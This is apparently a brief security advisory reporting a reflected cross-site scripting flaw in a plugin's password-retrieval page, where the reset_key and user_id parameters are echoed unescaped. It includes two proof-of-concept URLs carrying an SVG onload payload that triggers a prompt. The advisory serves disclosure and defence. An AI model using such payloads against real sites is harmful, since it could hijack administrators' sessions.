The plugin does not sanitise and escape the reset_key and user_id parameters before outputting then back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin
https://example.com/dashboard/retrieve-password/?reset_key="><svg onload=prompt(/XSS/)>&user;_id=dd https://example.com/dashboard/retrieve-password/?reset_key=a&user;_id="><svg onload=prompt(/XSS/)>